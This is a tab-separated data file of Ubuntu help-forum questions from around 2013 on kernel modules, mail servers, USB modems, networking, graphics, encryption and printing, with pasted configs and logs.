381921	inserting module format in 12.04 lts	emphasized texti know that `` insert module format '' because kernel version mismatch module version . so following root @ msis : /lib/modules/3.8.0-29-generic/updates/net/wireless # modinfo cfg80211.ko filename : cfg80211.ko version : backported from linux ( v3.12.1-0-g6beb1be ) using backports v3.12.1-1-0-g43eec7a alias : net-pf-16-proto-16-family-nl80211 description : wireless configuration support license : gpl author : johannes berg srcversion : 2a5760d6cd704be5f5c86af depends : compat vermagic : 3.8.0-29-generic smp mod_unload modversions 686 parm : ieee80211_regdom : ieee 802.11 regulatory domain code ( charp ) parm : cfg80211_disable_40mhz_24ghz : disable 40mhz support in the 2.4ghz band ( bool ) root @ msis : /lib/modules/3.8.0-29-generic/updates/net/wireless # uname -a linux msis 3.8.0-29-generic # 42~precise1-ubuntu smp wed aug 14 15:31:16 utc 2013 i686 i686 i386 gnu/linux this kernel version match module version . what is problem ? ? why `` insert module error message '' is print out ongoing ? ?
381923	package 'libapache2-mod-auth-mysql ' has no installation candidate	when i typedin the following command sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin , the output shown by the termianl is : - reading package lists ... done building dependency tree reading state information ... done package libapache2-mod-auth-mysql is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libapache2-mod-auth-mysql ' has no installation candidate
381925	dell inspiron n51100 black screen after login	after a normal login screen in ubuntu 13.10 i get a black screen with only my cursor . i tried to open in recovery mode to adjust the driver settings but that did n't work . i get an error that the screen can not be found . i really hope you can help !
381926	python 3.3 installation ubuntu 13.10	i have just installed ubuntu 3.10 and , although this version is still reliant on python 2 as the default , the python 3.3 interpreter is listed as installed in the software centre . does this mean that python 3.3 is already here somewhere , and if so how do i access it to run my code ? i know there are many questions about installing python 3.3 alongside 2.7.x in ubuntu ( and definitely not replacing it ! ) , but it seems to be already installed . however , in terminal i get 2.7.5 when i type 'python ' and the online documentation says that it was not possible to break the reliance on python 2 for this ubuntu release . i was expecting to have to install it in a different directory , but if this has already been done then i could avoid messing with a critical bit of ubuntu . thanks for your help !
381929	mounting shared folders	in our organization we are using ubuntu 12.4 as a server and client as well , in this clients job is to transfer or upload a file from their system to server in that case we try to use filezilla for ftp user but it is not showing network path it is showing only local drive do is that possible to mount a shared folder permanently in local folders is that possible let me know the solution for this thankyou .
381930	screen keeps black in ubuntu 13.10 when it must come out of sleep mode	i 'm running ubuntu 13.10 on a completely new machine , was fresh installed . after a while , while not working on it , the screen turns black , when you try to work again , you ca n't exit the black screen , you are forced to restart the computer . i tried various settings and also changed the setting in `` brightness and lock '' for when the screen turns off when inactive to a longer time . what can i do to rectify ? this is n't normal about ubuntu , right ?
381935	google web designer or adobe edge animate alternative for linux ?	gwd and edge animate have been very helpful on windows , but i have n't came across anything uniquely close for linux . i 've used amaya and kompozer for months and has been fairly helpful . however i 'd like to see something like gwd or edge animate available for linux . now i did try running those two apps with wine , but have n't had any luck . has anyone been able to run either of these apps via wine successfully ? in addition i was wondering if there 's something like gwd or edge animate available for linux ?
381936	usb drive is not detected on 12.04 lts	i have 15gb kingston pendrive . and it is not detected in ubuntu and remain hung up in windows . sudo fdisk -l output : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt disk /dev/sdb : 15.5 gb , 15479597056 bytes 64 heads , 32 sectors/track , 14762 cylinders , total 30233588 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xe31d9cb0 disk /dev/sdb does n't contain a valid partition table
381939	best practice for installing java on ubuntu / is it secure ?	much has been said about the security risks associated with java . however the burp suite ( pen test ) depends on java . is it secure to install java ? if so , how to properly do it ? my ubuntu is a web server and i do n't need java for web services - only for burp suite .
381940	assigning sounds on startup and shutdown	as every time i boot into ubuntu it makes sound , i want to assign a custom sound on startup as well as on log off and shutdown . is it possible ? ?
381942	how to install xp alongside 13.10 not the other way round	hi new to linux and loving the challenge i have converted an old machine to ubuntu 13.10 and realised i can do everything but sync my fruit based products , so i now want to take a slight back step and install windows just so i can sync the i devices . i am running into various issues first is probably my understanding of linux and secondly i can not seem to be able to resize the partition in gparted to make space for xp . any help would be greatly appreciated as im a bit far in to reinstall xp and do it that way round .
381943	sendmail installation & configuration	i know , that sendmail is old , buggy ( security ! ) , but i need to deploy it to my school project . i searched internet , but i did n't find my answer for my question . i want to deploy sendmail server based on ubuntu server + ubuntu dekstop both running on virtualbox in a 'virtual lan ' . how to configure postfix properly , so users would configure for eg . thunderbird & send e-mail 's through sendmail server . mail should be sent from @ example.com ( or other ) domain . it does n't to be send through the internet - it will be running locally . thanks , styra01
381946	is there a place or software in ubuntu like controol panel add/remove programs	is there a software or add/remove programs like windows that keeps a list of all installed used programs list on ubuntu . gui is prefered here . so that its easy . we do not have to use terminal .
381949	static routes for 2 subnet	i need your help on this . been trying to figure out how to make this work for hours ! my network skills are a bit rusty . alright , i have 2 interface , and i want to create a static route for each . 10.10.10.0/24 gw 10.10.10.1 10.167.95.0/26 gw 10.167.95.1 auto eth0 iface eth0 inet static address 10.167.95.25 netmask 255.255.255.192 # gateway 10.167.95.1 auto eth1 iface eth1 inet static address 10.10.10.100 netmask 255.255.255.0 gateway 10.10.10.1 how can i create this kind of route : all 0.0.0.0 - > 10.167.95.1 interface and for 10.0.0.0 - > 10.10.10.1 interface
381952	hybrid graphics - how do i know they 're switching appropriately ?	i have a dell inspiron 15 that has two graphics cards ; an amd radeon hd 7730m and an intel 4000hd . i 've installed catalyst drivers 13.1 . when i launch a 3d game like dota 2 , how can i check to see which graphics card is being used ?
381953	how to install winusb ?	i want to install winusb software on ubuntu 13.10 . installation via ppa method does n't work . sudo add-apt-repository ppa : colingille/freshlight sudo apt-get update sudo apt-get install winusb
381954	turn off close button in ubuntu	is there a possibility to turn off the close button in ubuntu ( i.e . via dconf ) ? i 'd like to have a window behavior like mac , so that i can not close any window with the close button ( only via ctrl+q ) and that i can just maximize or minimize it .
381955	differences between the hardware driver and the kernel driver ?	i am pretty new to linux . i always see two terms hardware driver and kernel driver . so what are the differences between the hardware driver and the kernel driver ?
381956	my ubuntu 13.04 is very very very slow	previously i am using sony . that has inbuilt windows 7 os . with recovery partition . i removed full that windows 7 with partition . so now my system is very slow.. i'am literally getting boor on ubuntu . please give me the solution for this ...
381958	add program to path	a new question today : ) . i 've downloaded sublime text 2 for linux ( x32 ) . now i want to add it to the path-variable . how does this work ? greets , baldoius
381959	core dump at recursive binary tree	static void treedestroynodes ( node * _currentnode ) { if ( _currentnode ) { treedestroynodes ( _currentnode- > m_left ) ; treedestroynodes ( _currentnode- > m_right ) ; free ( _currentnode ) ; } return ; } void treedestroy ( tree * _tree ) { if ( ! _tree ) { return ; } if ( ! _tree- > m_root ) { free ( _tree ) ; return ; } treedestroynodes ( _tree- > m_root ) ; free ( _tree ) ; } hello . i 'm getting a core dump before last line . would appreciate the help . thank you .
381960	how do i use postfix to send outgoing email ?	i am trying to set up postfix as an outgoing mail server for my domain . mainly i need postfix to run as a server to simply send outgoing mail for some cms software on the site ( e.g . : user registrations , password resets , etc ) . so far my configuration is proving to work to send mail locally , i can telnet to port 587 and send email to accounts/aliases that are configured on the local loopback interface . i have not managed to send any email outside localhost , which is really important here since i do n't expect every user to have an email account configured locally on this server , most/all users will likely be using some external free email account provider ( e.g . : @ gmail.com , @ hotmail.com , etc ) . when i login with `` telnet localhost 587 '' and try to send some test email to one of my own free email accounts at gmail and hotmail , these are the messages that appear in /var/log/mail.log : postfix/smtp [ 28066 ] : connect to mx2.hotmail.com [ 65.55.92.136 ] :25 : connection refused postfix/smtp [ 28066 ] : connect to mx2.hotmail.com [ 65.55.37.88 ] :25 : connection refused postfix/smtp [ 28066 ] : connect to mx1.hotmail.com [ 65.55.37.104 ] :25 : connection refused postfix/smtp [ 28066 ] : connect to mx1.hotmail.com [ 65.54.188.94 ] :25 : connection refused postfix/smtp [ 28066 ] : connect to mx1.hotmail.com [ 65.54.188.126 ] :25 : connection refused and of course the test email never arrives in in the hotmail/gmail inbox . here is my configuration layout for example : domainname.tld = main ( top level ) domain/host name mail.domainname.tld = this is the machine 's fqdn ( set in /etc/hostname ) i want to send out email from addresses with the origin @ domainname.tld , even though the actual fqdn of the machine running the postfix server is mail.domainname.tld . here is my /etc/postfix/main.cf : # see /usr/share/postfix/main.cf.dist for a commented , more complete version # debian specific : specifying a file name will cause the first # line of that file to be used as the name . the debian default # is /etc/mailname . # myorigin = /etc/mailname smtpd_banner = $ myhostname esmtp $ mail_name ( ubuntu ) biff = no # appending .domain is the mua 's job . append_dot_mydomain = no # uncomment the next line to generate `` delayed mail '' warnings # delay_warning_time = 4h readme_directory = no # tls parameters smtpd_tls_cert_file=/etc/ssl/certs/ssl-cert-snakeoil.pem smtpd_tls_key_file=/etc/ssl/private/ssl-cert-snakeoil.key smtpd_use_tls=yes smtpd_tls_session_cache_database = btree : $ { data_directory } /smtpd_scache smtp_tls_session_cache_database = btree : $ { data_directory } /smtp_scache # see /usr/share/doc/postfix/tls_readme.gz in the postfix-doc package for # information on enabling ssl in the smtp client . myhostname = domainname.tld alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases myorigin = /etc/mailname mydestination = mail.domainname.tld , localhost.domainname.tld , localhost.localdomain , localhost , domainname.tld relayhost = mynetworks = 127.0.0.0/8 [ : :ffff:127.0.0.0 ] /104 [ : :1 ] /128 mailbox_size_limit = 0 recipient_delimiter = + inet_interfaces = all # inet_interfaces = loopback-only home_mailbox = maildir/ in my /etc/postfix/master.cf i have only uncommented the `` submission '' line : # # postfix master process configuration file . for details on the format # of the file , see the master ( 5 ) manual page ( command : `` man 5 master '' ) . # # do not forget to execute `` postfix reload '' after editing this file . # # ========================================================================== # service type private unpriv chroot wakeup maxproc command + args # ( yes ) ( yes ) ( yes ) ( never ) ( 100 ) # ========================================================================== smtp inet n - - - - smtpd # smtp inet n - - - 1 postscreen # smtpd pass - - - - - smtpd # dnsblog unix - - - - 0 dnsblog # tlsproxy unix - - - - 0 tlsproxy submission inet n - - - - smtpd # -o syslog_name=postfix/submission # -o smtpd_tls_security_level=encrypt # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # smtps inet n - - - - smtpd # -o syslog_name=postfix/smtps # -o smtpd_tls_wrappermode=yes # -o smtpd_sasl_auth_enable=yes # -o smtpd_client_restrictions=permit_sasl_authenticated , reject # -o milter_macro_daemon_name=originating # 628 inet n - - - - qmqpd pickup fifo n - - 60 1 pickup cleanup unix n - - - 0 cleanup qmgr fifo n - n 300 1 qmgr # qmgr fifo n - n 300 1 oqmgr tlsmgr unix - - - 1000 ? 1 tlsmgr rewrite unix - - - - - trivial-rewrite bounce unix - - - - 0 bounce defer unix - - - - 0 bounce trace unix - - - - 0 bounce verify unix - - - - 1 verify flush unix n - - 1000 ? 0 flush proxymap unix - - n - - proxymap proxywrite unix - - n - 1 proxymap smtp unix - - - - - smtp relay unix - - - - - smtp # -o smtp_helo_timeout=5 -o smtp_connect_timeout=5 showq unix n - - - - showq error unix - - - - - error retry unix - - - - - error discard unix - - - - - discard local unix - n n - - local virtual unix - n n - - virtual lmtp unix - - - - - lmtp anvil unix - - - - 1 anvil scache unix - - - - 1 scache # # ==================================================================== # interfaces to non-postfix software . be sure to examine the manual # pages of the non-postfix software to find out what options it wants . # # many of the following services use the postfix pipe ( 8 ) delivery # agent . see the pipe ( 8 ) man page for information about $ { recipient } # and other message envelope options . # ==================================================================== # # maildrop . see the postfix maildrop_readme file for details . # also specify in main.cf : maildrop_destination_recipient_limit=1 # maildrop unix - n n - - pipe flags=drhu user=vmail argv=/usr/bin/maildrop -d $ { recipient } # # ==================================================================== # # recent cyrus versions can use the existing `` lmtp '' master.cf entry . # # specify in cyrus.conf : # lmtp cmd= '' lmtpd -a '' listen= '' localhost : lmtp '' proto=tcp4 # # specify in main.cf one or more of the following : # mailbox_transport = lmtp : inet : localhost # virtual_transport = lmtp : inet : localhost # # ==================================================================== # # cyrus 2.1.5 ( amos gouaux ) # also specify in main.cf : cyrus_destination_recipient_limit=1 # # cyrus unix - n n - - pipe # user=cyrus argv=/cyrus/bin/deliver -e -r $ { sender } -m $ { extension } $ { user } # # ==================================================================== # old example of delivery via cyrus . # # old-cyrus unix - n n - - pipe # flags=r user=cyrus argv=/cyrus/bin/deliver -e -m $ { extension } $ { user } # # ==================================================================== # # see the postfix uucp_readme file for configuration details . # uucp unix - n n - - pipe flags=fqhu user=uucp argv=uux -r -n -z -a $ sender - $ nexthop ! rmail ( $ recipient ) # # other external delivery methods . # ifmail unix - n n - - pipe flags=f user=ftn argv=/usr/lib/ifmail/ifmail -r $ nexthop ( $ recipient ) bsmtp unix - n n - - pipe flags=fq . user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t $ nexthop -f $ sender $ recipient scalemail-backend unix - n n - 2 pipe flags=r user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store $ { nexthop } $ { user } $ { extension } mailman unix - n n - - pipe flags=fr user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py $ { nexthop } $ { user } this is the result of `` ehlo domainname.tld '' in the localhost telnet session : 250-domainname.tld 250-pipelining 250-size 10240000 250-vrfy 250-etrn 250-starttls 250-enhancedstatuscodes 250-8bitmime 250 dsn can anyone please tell me why i can not send outgoing email outside localhost , why i am getting those connection refused errors ?
381963	where is the gnome classic menu metadata ?	after upgrading from 13.04 to 13.10 my gnome menu ( as in classic-menu-indicator ) is missing all my customized entries . the .desktop files are all still in .local/share/applications but the metadata to integrate them into the menu seems to be missing . so my questions a ) where is the metadata defining the menu structure and entries kept ? b ) how can i integrate my existing .desktop files into the menu i 'd be grateful for any help .
381969	bluetooth problem	i 'm using ubuntu 13.10 ( saucy ) in a dell n5010 notebook . my bluetooth is not detected . how to fix it . also do i need to install anything for my ati 512 mb graphics card for full utilizatiion of my graphics card features .
381970	huawei e173s 3g usb dongle wo n't switch into modem mode	output of lsusb | grep huawei is bus 003 device 003 : id 12d1:1c0b huawei technologies co. , ltd. e173s 3g broadband stick ( modem off ) i 've checked if usb_modeswitch is set up properly as per https : //wiki.archlinux.org/index.php/huawei_e173s . it is . enabled usb_modeswitch logging . the log output is below . seems like the device is identified by usb_modeswitch , and the switch message is sent , but no response . at this point i 'm thinking that either there 's a problem with the dongle 's firmware ( but it works fine under windows ) , or udev ca n't communicate with it for whatever reason . usb_modeswitch log from mon nov 25 14:38:11 2013 using global config file : /etc/usb_modeswitch.conf raw args from udev : /3-2:1.0 bus id for device not given by udev . trying to determine it from kernel name ( 3-2:1.0 ) ... using top device dir /sys/bus/usb/devices/3-2 usb dir exists : /sys/bus/usb/devices/3-2 warning : usb attribute `` serial '' not readable . scsi dir exists : /sys/bus/usb/devices/3-2 warning : scsi attribute `` vendor '' not readable . warning : scsi attribute `` model '' not readable . warning : scsi attribute `` rev '' not readable . -- -- -- -- -- -- -- -- usb values from sysfs : idvendor 12d1 idproduct 1c0b manufacturer huawei product huawei mobile serial ( null ) bnumconfigurations 1 -- -- -- -- -- -- -- -- bnumconfigurations is 1 - do n't check for active configuration found packed config collection /usr/share/usb_modeswitch/configpack.tar.gz searching entries named : /usr/share/usb_modeswitch/12d1:1c0b* searching overriding entries named : /etc/usb_modeswitch.d/12d1:1c0b* scsi attributes not needed , moving on . extracting config 12d1:1c0b from collection /usr/share/usb_modeswitch/configpack.tar.gz config : targetvendor set to 12d1 config : targetproduct set to 1c05,1c07,1c08,1c10 driver module is `` option '' , id path is /sys/bus/usb-serial/drivers/option1 ! matched , now switching command to be run : /usr/sbin/usb_modeswitch -i -w -d -s 20 -c /run/usb_modeswitch/current_cfg -u -1 -v 12d1 -p 1c0b 2 > & 1 verbose debug output of usb_modeswitch and libusb follows ( note that some usb errors are expected in the process ) -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- reading config file : /run/usb_modeswitch/current_cfg * usb_modeswitch : handle usb devices with multiple modes * version 1.2.3 ( c ) josua dietze 2012 * based on libusb0 ( 0.1.12 and above ) ! please report new configurations ! defaultvendor= 0x12d1 defaultproduct= 0x1c0b targetvendor= 0x12d1 targetproduct= not set targetclass= not set targetproductlist= '' 1c05,1c07,1c08,1c10 '' detachstorageonly=0 huaweimode=0 sierramode=0 sonymode=0 qisdamode=0 gctmode=0 kobilmode=0 sequansmode=0 mobileactionmode=0 ciscomode=0 messageendpoint= not set messagecontent= '' 55534243123456780000000000000011062000000100000000000000000000 '' needresponse=0 responseendpoint= not set inquiredevice disabled success check enabled , max . wait time 20 seconds system integration mode enabled looking for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 no devices in target mode or class found looking for default devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id found matching product id adding device searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 found device in default mode , class or configuration ( 1 ) accessing device 003 on bus 003 ... skipping the check for the current configuration using first interface : 0x00 using endpoints 0x0f ( out ) and 0x8f ( in ) usb description data ( for identification ) -- -- -- -- -- -- -- -- -- -- -- -- - manufacturer : huawei product : huawei mobile serial no . : not provided -- -- -- -- -- -- -- -- -- -- -- -- - looking for active driver ... ok , driver found ( `` usb-storage '' ) ok , driver `` usb-storage '' detached setting up communication with interface 0 using endpoint 0x0f for message sending ... trying to send message 1 to endpoint 0x0f ... ok , message successfully sent resetting response endpoint 0x8f resetting message endpoint 0x0f checking for mode switch ( max . 20 times , once per second ) ... searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching for target devices ... searching devices , found usb id 1d6b:0003 searching devices , found usb id 12d1:1c0b found matching vendor id searching devices , found usb id 1d6b:0002 searching devices , found usb id 148f:2000 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 searching devices , found usb id 064e : e258 searching devices , found usb id 138a:0018 searching devices , found usb id 8087:0024 searching devices , found usb id 1d6b:0002 no new devices in target mode or class found mode switch has failed . bye . fail : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( end of usb_modeswitch output ) usb dir exists : /sys/bus/usb/devices/3-2 warning : usb attribute `` serial '' not readable . all done , exiting update . have set various delays . quotation from http : //www.draisberghof.de/usb_modeswitch/ # trouble : annother way of influencing the kernel behaviour is the parameter `` delay_use '' of `` usb-storage '' which sets the time in seconds after plugging when the storage device will actually be used ( and probably automounted ) . the default value is 5 ; this might affect the switching result under certain conditions . to change the default add in /etc/modprobe.conf : options usb-storage delay_use=1 ( or 10 , or other ) with delay of 1-3 , works sometimes . sometimes does n't . update 2 . after days of testing , i have an impression that it is not any particular delay setting which makes usb_modeswitch work , but changing this setting . also i have a ( very tentative ) feeling that logging in/out and changing autologin settings somehow interferes with modeswitching .
381971	hardblock for wireless does n't react	yesterday i decided to install ubuntu 12.04 on my laptop . the os is working properly , there are no problems . lan works ok , but wlan just wo n't turn on . there 's a button on the laptop which enable wlan connection , but when i press it , nothing happens . usually the button glows a blue light when wlan is on , but now it does not react . here 's the output for rfkill list all : 0 : hp-wifi : wireless lan soft blocked : no hard blocked : yes dmesg | grep iwl does not give any output . here 's the output for lspci | grep network : 08:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 )
381972	samba as print server	i have a 32-bit computer installed with ubuntu 12.04 which has a canon lbp 3300 printer connected . the printer is configured and prints successfully . i want to create a print server on the ubuntu machine so that i can print wirelessly from my other computers . at present i can print wirelessly from mac & ubuntu computers , but i am unable to print from my windows pc ( 32-bit ) . i tried to go through this https : //wiki.samba.org/index.php/samba_as_a_print_server but was unsuccessful . can anybody help me to set it up for windows pc . thanks in advance .
381975	how can i know whether the luks is using passphrase or key file for authentication purpose ?	lets an example , i have a linux partition /dev/sda6 and already encryption been enabled with dm-crypt ( cryptsetup ) tool . as i know dm-crypt can have two way of authentication like with key file or passphrase which we can specify at the time of enabling of encryption . but is there any way so that i can identify the encryption enabled happened with key file or passphrase from its luks header or any other possible option ?
381977	how to play music , coming from the microphone jack ?	i have a usb device attached , which enumerates as a microphone . it streams some music , and i can easily record it with e.g . audacity . however , i want not to record it , but jsut listen on my headphones . i have alsa and pulse audio installed as usual . what is the best way to route the audio to my wishes ?
381978	how to display resource usage gadget on my unity desctop ?	i am confused . so , unity is a set of tools , put on top of gnome 2 , and giving it a new look and feel ? and gnome 3 is something different . all i manage to do is create quick-launch favourites , as well as desktop shortcuts . however , the great customazability of gnome 2 classic is gone to me . how do i get something , similar to this ( the two graphical indicators in the top bar ) ?
381981	ubuntu 12.10 problem	i was upgrading to ubuntu 12.10 from ubuntu 12.04 lts . after the download during the installation period , the computer 's screen got locked and when i tried to unlock the screen , the black screen continued . so i switched it off and when i turned it on back again , it showed that ubuntu is running on low graphics and i need configure it manually . i tried the `` run in low graphics for one session '' option , but the screen just got dark . please help . i am using asus eee pc .
